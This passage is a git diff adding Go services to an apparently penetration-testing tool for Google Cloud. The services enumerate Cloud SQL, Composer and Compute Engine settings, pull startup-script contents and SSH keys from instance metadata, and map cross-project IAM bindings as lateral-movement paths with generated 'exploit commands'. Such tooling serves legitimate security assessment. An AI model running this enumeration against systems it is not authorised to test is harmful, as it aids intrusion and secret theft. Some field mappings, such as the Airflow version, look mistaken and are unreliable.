BinaryLogEnabled bool + BackupLocation string + PointInTimeRecovery bool + RetentionDays int + + // Encryption + KMSKeyName string + EncryptionType string // Google-managed or CMEK + + // High Availability + AvailabilityType string // REGIONAL or ZONAL + FailoverReplica string + + // Maintenance + MaintenanceWindow string + + // Databases (if enumerated) + Databases []string + + // Security issues detected + SecurityIssues []string +} + +// AuthorizedNetwork represents a network authorized to connect +type AuthorizedNetwork struct { + Name string + Value string // CIDR + IsPublic bool // 0.0.0.0/0 or similar +} + +// Instances retrieves all Cloud SQL instances in a project +func (cs *CloudSQLService) Instances(projectID string) ([]SQLInstanceInfo, error) { + ctx := context.Background() + + service, err := sqladmin.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + var instances []SQLInstanceInfo + for _, instance := range resp.Items { + info := parseInstanceInfo(instance, projectID) + instances = append(instances, info) + } + + return instances, nil +} + +// parseInstanceInfo extracts security-relevant information from a Cloud SQL instance +func parseInstanceInfo(instance *sqladmin.DatabaseInstance, projectID string) SQLInstanceInfo { + info := SQLInstanceInfo{ + Name: instance.Name, + ProjectID: projectID, + DatabaseVersion: instance.DatabaseVersion, + State: instance.State, + SecurityIssues: []string{}, + } + + // Region from GCE zone + if instance.GceZone != "" { + // Zone format: us-central1-a -> extract region us-central1 + parts := strings.Split(instance.GceZone, "-") + if len(parts) >= 2 { + info.Region = parts[0] + "-" + parts[1] + } + } else if instance.Region != "" { + info.Region = instance.Region + } + + // Settings + if instance.Settings != nil { + info.Tier = instance.Settings.Tier + info.AvailabilityType = instance.Settings.AvailabilityType + + // IP configuration + if instance.Settings.IpConfiguration != nil { + ipConfig := instance.Settings.IpConfiguration + info.RequireSSL = ipConfig.RequireSsl + info.SSLMode = ipConfig.SslMode + info.IAMAuthentication = ipConfig.EnablePrivatePathForGoogleCloudServices + + // Check for private IP + if ipConfig.PrivateNetwork != "" { + info.HasPublicIP = ipConfig.Ipv4Enabled + } else { + info.HasPublicIP = true // Default is public + } + + // Parse authorized networks + for _, network := range ipConfig.AuthorizedNetworks { + an := AuthorizedNetwork{ + Name: network.Name, + Value: network.Value, + } + // Check if network is public (0.0.0.0/0 or similar broad ranges) + if network.Value == "0.0.0.0/0" || + network.Value == "0.0.0.0/1" || + network.Value == "128.0.0.0/1" { + an.IsPublic = true + } + info.AuthorizedNetworks = append(info.AuthorizedNetworks, an) + } + } + + // Backup configuration + if instance.Settings.BackupConfiguration != nil { + backup := instance.Settings.BackupConfiguration + info.BackupEnabled = backup.Enabled + info.BinaryLogEnabled = backup.BinaryLogEnabled + info.BackupLocation = backup.Location + info.PointInTimeRecovery = backup.PointInTimeRecoveryEnabled + info.RetentionDays = int(backup.TransactionLogRetentionDays) + } + + // Password policy + if instance.Settings.PasswordValidationPolicy != nil { + info.PasswordPolicyEnabled = instance.Settings.PasswordValidationPolicy.EnablePasswordPolicy + } + + // Maintenance window + if instance.Settings.MaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Day %d, Hour %d", + instance.Settings.MaintenanceWindow.Day, + instance.Settings.MaintenanceWindow.Hour) + } + + // Database flags (can reveal security settings) + // These could be parsed for specific security-relevant flags + } + + // IP addresses + for _, ip := range instance.IpAddresses { + switch ip.Type { + case "PRIMARY": + info.PublicIP = ip.IpAddress + case "PRIVATE": + info.PrivateIP = ip.IpAddress + } + } + + // Service account + info.ServiceAccountEmail = instance.ServiceAccountEmailAddress + + // Disk encryption + if instance.DiskEncryptionConfiguration != nil { + info.KMSKeyName = instance.DiskEncryptionConfiguration.KmsKeyName + if info.KMSKeyName != "" { + info.EncryptionType = "CMEK" + } else { + info.EncryptionType = "Google-managed" + } + } else { + info.EncryptionType = "Google-managed" + } + + // Failover replica + if instance.FailoverReplica != nil { + info.FailoverReplica = instance.FailoverReplica.Name + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(instance SQLInstanceInfo) []string { + var issues []string + + // Public IP enabled + if instance.HasPublicIP { + issues = append(issues, "Public IP enabled") + } + + // Public IP without SSL requirement + if instance.HasPublicIP && !instance.RequireSSL { + issues = append(issues, "Public IP without SSL requirement") + } + + // Authorized networks include 0.0.0.0/0 + for _, network := range instance.AuthorizedNetworks { + if network.IsPublic { + issues = append(issues, fmt.Sprintf("Authorized network allows all IPs: %s", network.Value)) + } + } + + // No authorized networks but public IP (potentially open to all) + if instance.HasPublicIP && len(instance.AuthorizedNetworks) == 0 { + issues = append(issues, "Public IP with no authorized networks (blocked by default, but verify)") + } + + // Backups not enabled + if !instance.BackupEnabled { + issues = append(issues, "Automated backups not enabled") + } + + // Point-in-time recovery not enabled + if !instance.PointInTimeRecovery && instance.BackupEnabled { + issues = append(issues, "Point-in-time recovery not enabled") + } + + // Using Google-managed encryption (not CMEK) + if instance.EncryptionType == "Google-managed" { + // This is informational, not necessarily an issue + // issues = append(issues, "Using Google-managed encryption (not CMEK)") + } + + // Single zone deployment + if instance.AvailabilityType == "ZONAL" { + issues = append(issues, "Single zone deployment (no HA)") + } + + // Password policy not enabled + if !instance.PasswordPolicyEnabled { + issues = append(issues, "Password validation policy not enabled") + } + + return issues +} diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go new file mode 100644 index 00000000..c9ad22f3 --- /dev/null +++ b/gcp/services/composerService/composerService.go @@ -0,0 +1,160 @@ +package composerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + composer "google.golang.org/api/composer/v1" +) + +type ComposerService struct { + session *gcpinternal.SafeSession +} + +func New() *ComposerService { + return &ComposerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *ComposerService { + return &ComposerService{session: session} +} + +// EnvironmentInfo represents a Cloud Composer environment +type EnvironmentInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Airflow config + AirflowURI string `json:"airflowUri"` + DagGcsPrefix string `json:"dagGcsPrefix"` + AirflowVersion string `json:"airflowVersion"` + PythonVersion string `json:"pythonVersion"` + ImageVersion string `json:"imageVersion"` + + // Node config + MachineType string `json:"machineType"` + DiskSizeGb int64 `json:"diskSizeGb"` + NodeCount int64 `json:"nodeCount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + ServiceAccount string `json:"serviceAccount"` + + // Security config + PrivateEnvironment bool `json:"privateEnvironment"` + WebServerAllowedIPs []string `json:"webServerAllowedIps"` + EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` +} + +// ListEnvironments retrieves all Composer environments in a project +func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, error) { + ctx := context.Background() + var service *composer.Service + var err error + + if s.session != nil { + service, err = composer.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = composer.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") + } + + var environments []EnvironmentInfo + + // List environments across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Environments.List(parent) + err = req.Pages(ctx, func(page *composer.ListEnvironmentsResponse) error { + for _, env := range page.Environments { + info := s.parseEnvironment(env, projectID) + environments = append(environments, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") + } + + return environments, nil +} + +// parseEnvironment converts a Composer environment to EnvironmentInfo +func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID string) EnvironmentInfo { + info := EnvironmentInfo{ + Name: extractName(env.Name), + ProjectID: projectID, + Location: extractLocation(env.Name), + State: env.State, + CreateTime: env.CreateTime, + UpdateTime: env.UpdateTime, + } + + if env.Config != nil { + // Airflow config + if env.Config.AirflowUri != "" { + info.AirflowURI = env.Config.AirflowUri + } + info.DagGcsPrefix = env.Config.DagGcsPrefix + + // Software config + if env.Config.SoftwareConfig != nil { + info.AirflowVersion = env.Config.SoftwareConfig.AirflowConfigOverrides["core-dags_are_paused_at_creation"] + info.PythonVersion = env.Config.SoftwareConfig.PythonVersion + info.ImageVersion = env.Config.SoftwareConfig.ImageVersion + } + + // Node config + if env.Config.NodeConfig != nil { + info.MachineType = env.Config.NodeConfig.MachineType + info.DiskSizeGb = env.Config.NodeConfig.DiskSizeGb + info.Network = env.Config.NodeConfig.Network + info.Subnetwork = env.Config.NodeConfig.Subnetwork + info.ServiceAccount = env.Config.NodeConfig.ServiceAccount + } + + info.NodeCount = env.Config.NodeCount + + // Private environment config + if env.Config.PrivateEnvironmentConfig != nil { + info.PrivateEnvironment = env.Config.PrivateEnvironmentConfig.EnablePrivateEnvironment + // EnablePrivateEndpoint is part of PrivateClusterConfig, not PrivateEnvironmentConfig + if env.Config.PrivateEnvironmentConfig.PrivateClusterConfig != nil { + info.EnablePrivateEndpoint = env.Config.PrivateEnvironmentConfig.PrivateClusterConfig.EnablePrivateEndpoint + } + } + + // Web server network access control + if env.Config.WebServerNetworkAccessControl != nil { + for _, cidr := range env.Config.WebServerNetworkAccessControl.AllowedIpRanges { + info.WebServerAllowedIPs = append(info.WebServerAllowedIPs, cidr.Value) + } + } + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index bcff7739..efa3fada 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -5,41 +5,163 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/compute/v1" ) type ComputeEngineService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new ComputeEngineService (legacy - uses ADC directly) func New() *ComputeEngineService { return &ComputeEngineService{} } +// NewWithSession creates a ComputeEngineService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *ComputeEngineService { + return &ComputeEngineService{session: session} +} + +// ServiceAccountInfo contains service account details for an instance +type ServiceAccountInfo struct { + Email string `json:"email"` + Scopes []string `json:"scopes"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ComputeEngineInfo contains instance metadata and security-relevant configuration type ComputeEngineInfo struct { - Name string - ID string - Zone string - State string - ExternalIP string - InternalIP string - ServiceAccounts []*compute.ServiceAccount // Assuming role is derived from service accounts - NetworkInterfaces []*compute.NetworkInterface - Tags *compute.Tags - ProjectID string + // Basic info + Name string `json:"name"` + ID string `json:"id"` + Zone string `json:"zone"` + State string `json:"state"` + ProjectID string `json:"projectID"` + + // Network configuration + ExternalIP string `json:"externalIP"` + InternalIP string `json:"internalIP"` + NetworkInterfaces []*compute.NetworkInterface `json:"networkInterfaces"` + CanIPForward bool `json:"canIpForward"` // Can forward packets (router/NAT) + + // Service accounts and scopes + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + HasDefaultSA bool `json:"hasDefaultSA"` // Uses default compute SA + HasCloudScopes bool `json:"hasCloudScopes"` // Has cloud-platform or other broad scopes + + // Security configuration + DeletionProtection bool `json:"deletionProtection"` // Protected against deletion + ShieldedVM bool `json:"shieldedVM"` // Shielded VM enabled + SecureBoot bool `json:"secureBoot"` // Secure Boot enabled + VTPMEnabled bool `json:"vtpmEnabled"` // vTPM enabled + IntegrityMonitoring bool `json:"integrityMonitoring"` // Integrity monitoring enabled + ConfidentialVM bool `json:"confidentialVM"` // Confidential computing enabled + + // Instance metadata + MachineType string `json:"machineType"` + Tags *compute.Tags `json:"tags"` + Labels map[string]string `json:"labels"` + + // Metadata security + HasStartupScript bool `json:"hasStartupScript"` // Has startup script in metadata + HasSSHKeys bool `json:"hasSSHKeys"` // Has SSH keys in metadata + BlockProjectSSHKeys bool `json:"blockProjectSSHKeys"` // Blocks project-wide SSH keys + OSLoginEnabled bool `json:"osLoginEnabled"` // OS Login enabled + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` // OS Login 2FA enabled + SerialPortEnabled bool `json:"serialPortEnabled"` // Serial port access enabled + + // Pentest-specific fields: actual content extraction + StartupScriptContent string `json:"startupScriptContent"` // Actual startup script content + StartupScriptURL string `json:"startupScriptURL"` // URL to startup script if remote + SSHKeys []string `json:"sshKeys"` // Extracted SSH keys + CustomMetadata []string `json:"customMetadata"` // Other custom metadata keys + + // Disk encryption + BootDiskEncryption string `json:"bootDiskEncryption"` // "Google-managed", "CMEK", or "CSEK" + BootDiskKMSKey string `json:"bootDiskKMSKey"` // KMS key for CMEK + + // Timestamps + CreationTimestamp string `json:"creationTimestamp"` + LastStartTimestamp string `json:"lastStartTimestamp"` + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// ProjectMetadataInfo contains project-level metadata security info +type ProjectMetadataInfo struct { + ProjectID string `json:"projectId"` + HasProjectSSHKeys bool `json:"hasProjectSSHKeys"` + ProjectSSHKeys []string `json:"projectSSHKeys"` + HasProjectStartupScript bool `json:"hasProjectStartupScript"` + ProjectStartupScript string `json:"projectStartupScript"` + OSLoginEnabled bool `json:"osLoginEnabled"` + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` + SerialPortEnabled bool `json:"serialPortEnabled"` + CustomMetadataKeys []string `json:"customMetadataKeys"` +} + +// InstanceIAMInfo contains IAM policy info for an instance +type InstanceIAMInfo struct { + InstanceName string `json:"instanceName"` + Zone string `json:"zone"` + ProjectID string `json:"projectId"` + ComputeAdmins []string `json:"computeAdmins"` // compute.admin or owner + InstanceAdmins []string `json:"instanceAdmins"` // compute.instanceAdmin + SSHUsers []string `json:"sshUsers"` // compute.osLogin or osAdminLogin + MetadataSetters []string `json:"metadataSetters"` // compute.instances.setMetadata +} + +// getService returns a compute service, using session if available +func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Service, error) { + if ces.session != nil { + return compute.NewService(ctx, ces.session.GetClientOption()) + } + return compute.NewService(ctx) +} + +// getInstanceIAMBindings retrieves all IAM bindings for an instance +func (ces *ComputeEngineService) getInstanceIAMBindings(service *compute.Service, projectID, zone, instanceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.Instances.GetIamPolicy(projectID, zone, instanceName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings } // Retrieves instances from all regions and zones for a project without using concurrency. func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + computeService, err := ces.getService(ctx) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } regions, err := computeService.Regions.List(projectID).Do() if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var instanceInfos []ComputeEngineInfo @@ -48,21 +170,66 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf zone := getZoneNameFromURL(zoneURL) instanceList, err := computeService.Instances.List(projectID, zone).Do() if err != nil { - return nil, fmt.Errorf("error retrieving instances from zone %s: %v", zone, err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, instance := range instanceList.Items { info := ComputeEngineInfo{ - Name: instance.Name, - ID: fmt.Sprintf("%v", instance.Id), - Zone: zoneURL, - State: instance.Status, - ExternalIP: getExternalIP(instance), - InternalIP: getInternalIP(instance), - ServiceAccounts: instance.ServiceAccounts, - NetworkInterfaces: instance.NetworkInterfaces, - Tags: instance.Tags, - ProjectID: projectID, + Name: instance.Name, + ID: fmt.Sprintf("%v", instance.Id), + Zone: zone, + State: instance.Status, + ExternalIP: getExternalIP(instance), + InternalIP: getInternalIP(instance), + NetworkInterfaces: instance.NetworkInterfaces, + CanIPForward: instance.CanIpForward, + Tags: instance.Tags, + Labels: instance.Labels, + ProjectID: projectID, + DeletionProtection: instance.DeletionProtection, + CreationTimestamp: instance.CreationTimestamp, + LastStartTimestamp: instance.LastStartTimestamp, + } + + // Parse machine type (extract just the type name) + info.MachineType = getMachineTypeName(instance.MachineType) + + // Parse service accounts and scopes + info.ServiceAccounts, info.HasDefaultSA, info.HasCloudScopes = parseServiceAccounts(instance.ServiceAccounts, projectID) + + // Parse shielded VM config + if instance.ShieldedInstanceConfig != nil { + info.ShieldedVM = true + info.SecureBoot = instance.ShieldedInstanceConfig.EnableSecureBoot + info.VTPMEnabled = instance.ShieldedInstanceConfig.EnableVtpm + info.IntegrityMonitoring = instance.ShieldedInstanceConfig.EnableIntegrityMonitoring } + + // Parse confidential VM config + if instance.ConfidentialInstanceConfig != nil { + info.ConfidentialVM = instance.ConfidentialInstanceConfig.EnableConfidentialCompute + } + + // Parse metadata for security-relevant items including content + if instance.Metadata != nil { + metaResult := parseMetadataFull(instance.Metadata) + info.HasStartupScript = metaResult.HasStartupScript + info.HasSSHKeys = metaResult.HasSSHKeys + info.BlockProjectSSHKeys = metaResult.BlockProjectSSHKeys + info.OSLoginEnabled = metaResult.OSLoginEnabled + info.OSLogin2FAEnabled = metaResult.OSLogin2FA + info.SerialPortEnabled = metaResult.SerialPortEnabled + info.StartupScriptContent = metaResult.StartupScriptContent + info.StartupScriptURL = metaResult.StartupScriptURL + info.SSHKeys = metaResult.SSHKeys + info.CustomMetadata = metaResult.CustomMetadata + } + + // Parse boot disk encryption + info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) + + // Fetch IAM bindings for this instance + info.IAMBindings = ces.getInstanceIAMBindings(computeService, projectID, zone, instance.Name) + instanceInfos = append(instanceInfos, info) } } @@ -96,4 +263,326 @@ func getInternalIP(instance *compute.Instance) string { return "" } -// TODO consider just getting the emails of the service account and returning a []string +// getMachineTypeName extracts the machine type name from a full URL +func getMachineTypeName(machineTypeURL string) string { + parts := strings.Split(machineTypeURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return machineTypeURL +} + +// parseServiceAccounts extracts service account info and checks for security concerns +func parseServiceAccounts(sas []*compute.ServiceAccount, projectID string) ([]ServiceAccountInfo, bool, bool) { + var accounts []ServiceAccountInfo + hasDefaultSA := false + hasCloudScopes := false + + defaultSAPattern := fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectID) + + for _, sa := range sas { + info := ServiceAccountInfo{ + Email: sa.Email, + Scopes: sa.Scopes, + } + accounts = append(accounts, info) + + // Check if using default compute service account + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") || + strings.HasSuffix(sa.Email, defaultSAPattern) { + hasDefaultSA = true + } + + // Check for broad scopes + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" || + scope == "https://www.googleapis.com/auth/compute" || + scope == "https://www.googleapis.com/auth/devstorage.full_control" || + scope == "https://www.googleapis.com/auth/devstorage.read_write" { + hasCloudScopes = true + } + } + } + + return accounts, hasDefaultSA, hasCloudScopes +} + +// MetadataParseResult contains all parsed metadata fields +type MetadataParseResult struct { + HasStartupScript bool + HasSSHKeys bool + BlockProjectSSHKeys bool + OSLoginEnabled bool + OSLogin2FA bool + SerialPortEnabled bool + StartupScriptContent string + StartupScriptURL string + SSHKeys []string + CustomMetadata []string +} + +// parseMetadata checks instance metadata for security-relevant settings +func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, blockProjectSSHKeys, osLoginEnabled, osLogin2FA, serialPortEnabled bool) { + result := parseMetadataFull(metadata) + return result.HasStartupScript, result.HasSSHKeys, result.BlockProjectSSHKeys, + result.OSLoginEnabled, result.OSLogin2FA, result.SerialPortEnabled +} + +// parseMetadataFull extracts all metadata including content +func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { + result := MetadataParseResult{} + if metadata == nil || metadata.Items == nil { + return result + } + + // Known metadata keys to exclude from custom metadata + knownKeys := map[string]bool{ + "startup-script": true, + "startup-script-url": true, + "ssh-keys": true, + "sshKeys": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, + } + + for _, item := range metadata.Items { + if item == nil { + continue + } + + switch item.Key { + case "startup-script": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptContent = *item.Value + } + case "startup-script-url": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptURL = *item.Value + } + case "ssh-keys", "sshKeys": + result.HasSSHKeys = true + if item.Value != nil { + // Parse SSH keys - format is "user:ssh-rsa KEY comment" + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + result.SSHKeys = append(result.SSHKeys, line) + } + } + } + case "block-project-ssh-keys": + if item.Value != nil && *item.Value == "true" { + result.BlockProjectSSHKeys = true + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + result.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + result.OSLogin2FA = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + result.SerialPortEnabled = true + } + default: + // Track custom metadata keys (may contain secrets) + if !knownKeys[item.Key] { + result.CustomMetadata = append(result.CustomMetadata, item.Key) + } + } + } + + return result +} + +// parseBootDiskEncryption checks the boot disk encryption type +func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) { + encryptionType = "Google-managed" + + for _, disk := range disks { + if disk == nil || !disk.Boot { + continue + } + + if disk.DiskEncryptionKey != nil { + if disk.DiskEncryptionKey.KmsKeyName != "" { + encryptionType = "CMEK" + kmsKey = disk.DiskEncryptionKey.KmsKeyName + } else if disk.DiskEncryptionKey.Sha256 != "" { + encryptionType = "CSEK" + } + } + break // Only check boot disk + } + + return +} + +// FormatScopes formats service account scopes for display +func FormatScopes(scopes []string) string { + if len(scopes) == 0 { + return "-" + } + + // Shorten scope URLs for display + var shortScopes []string + for _, scope := range scopes { + // Extract the scope name from the URL + parts := strings.Split(scope, "/") + if len(parts) > 0 { + shortScopes = append(shortScopes, parts[len(parts)-1]) + } + } + return strings.Join(shortScopes, ", ") +} + +// GetProjectMetadata retrieves project-level compute metadata +func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectMetadataInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + info := &ProjectMetadataInfo{ + ProjectID: projectID, + } + + if project.CommonInstanceMetadata != nil { + for _, item := range project.CommonInstanceMetadata.Items { + if item == nil { + continue + } + + switch item.Key { + case "ssh-keys", "sshKeys": + info.HasProjectSSHKeys = true + if item.Value != nil { + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + info.ProjectSSHKeys = append(info.ProjectSSHKeys, line) + } + } + } + case "startup-script": + info.HasProjectStartupScript = true + if item.Value != nil { + info.ProjectStartupScript = *item.Value + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLogin2FAEnabled = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + info.SerialPortEnabled = true + } + default: + // Track other custom metadata that might contain secrets + if !isKnownMetadataKey(item.Key) { + info.CustomMetadataKeys = append(info.CustomMetadataKeys, item.Key) + } + } + } + } + + return info, nil +} + +// isKnownMetadataKey checks if a metadata key is a known system key +func isKnownMetadataKey(key string) bool { + knownKeys := map[string]bool{ + "ssh-keys": true, + "sshKeys": true, + "startup-script": true, + "startup-script-url": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, + "google-compute-enable-logging": true, + "google-compute-enable-ssh-agent": true, + } + return knownKeys[key] +} + +// GetInstanceIAMPolicy retrieves IAM policy for a specific instance +func (ces *ComputeEngineService) GetInstanceIAMPolicy(projectID, zone, instanceName string) (*InstanceIAMInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instanceName).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + info := &InstanceIAMInfo{ + InstanceName: instanceName, + Zone: zone, + ProjectID: projectID, + } + + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + switch binding.Role { + case "roles/compute.admin", "roles/owner": + info.ComputeAdmins = append(info.ComputeAdmins, binding.Members...) + case "roles/compute.instanceAdmin", "roles/compute.instanceAdmin.v1": + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + case "roles/compute.osLogin", "roles/compute.osAdminLogin": + info.SSHUsers = append(info.SSHUsers, binding.Members...) + } + + // Check for specific permissions via custom roles (more complex detection) + if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { + // Custom role - would need to check permissions, but we note the binding + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + } + } + + return info, nil +} + +// InstancesWithMetadata retrieves instances with full metadata content +func (ces *ComputeEngineService) InstancesWithMetadata(projectID string) ([]ComputeEngineInfo, *ProjectMetadataInfo, error) { + instances, err := ces.Instances(projectID) + if err != nil { + return nil, nil, err + } + + projectMeta, err := ces.GetProjectMetadata(projectID) + if err != nil { + // Don't fail if we can't get project metadata + projectMeta = &ProjectMetadataInfo{ProjectID: projectID} + } + + return instances, projectMeta, nil +} diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go new file mode 100644 index 00000000..104322ad --- /dev/null +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -0,0 +1,424 @@ +package crossprojectservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" +) + +type CrossProjectService struct{} + +func New() *CrossProjectService { + return &CrossProjectService{} +} + +// CrossProjectBinding represents a cross-project IAM binding +type CrossProjectBinding struct { + SourceProject string `json:"sourceProject"` // Where the principal is from + TargetProject string `json:"targetProject"` // Where access is granted + Principal string `json:"principal"` // The service account or user + PrincipalType string `json:"principalType"` // serviceAccount, user, group + Role string `json:"role"` // The IAM role granted + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` // Why it's risky + ExploitCommands []string `json:"exploitCommands"` // Commands for exploitation +} + +// CrossProjectServiceAccount represents a service account that may have cross-project access +type CrossProjectServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + UniqueID string `json:"uniqueId"` + TargetAccess []string `json:"targetAccess"` // Other projects this SA can access +} + +// LateralMovementPath represents a potential lateral movement path +type LateralMovementPath struct { + SourceProject string `json:"sourceProject"` + SourcePrincipal string `json:"sourcePrincipal"` + TargetProject string `json:"targetProject"` + AccessMethod string `json:"accessMethod"` // e.g., "impersonation", "direct role" + TargetRoles []string `json:"targetRoles"` + PrivilegeLevel string `json:"privilegeLevel"` // ADMIN, WRITE, READ + ExploitCommands []string `json:"exploitCommands"` +} + +// AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects +func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([]CrossProjectBinding, error) { + ctx := context.Background() + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var crossProjectBindings []CrossProjectBinding + + // Build a map of project IDs for quick lookup + projectMap := make(map[string]bool) + for _, pid := range projectIDs { + projectMap[pid] = true + } + + // Analyze IAM policy of each project + for _, targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue // Skip projects we can't access + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sourceProject := extractProjectFromMember(member) + + // Check if this is cross-project access + if sourceProject != "" && sourceProject != targetProject { + // Check if source project is in our analysis scope + isFromKnownProject := projectMap[sourceProject] + + cpBinding := CrossProjectBinding{ + SourceProject: sourceProject, + TargetProject: targetProject, + Principal: member, + PrincipalType: extractPrincipalType(member), + Role: binding.Role, + RiskReasons: []string{}, + } + + // Analyze risk level + cpBinding.RiskLevel, cpBinding.RiskReasons = s.analyzeBindingRisk(binding.Role, member, isFromKnownProject) + cpBinding.ExploitCommands = s.generateExploitCommands(cpBinding) + + crossProjectBindings = append(crossProjectBindings, cpBinding) + } + } + } + } + + return crossProjectBindings, nil +} + +// GetCrossProjectServiceAccounts finds service accounts with cross-project access +func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string) ([]CrossProjectServiceAccount, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } 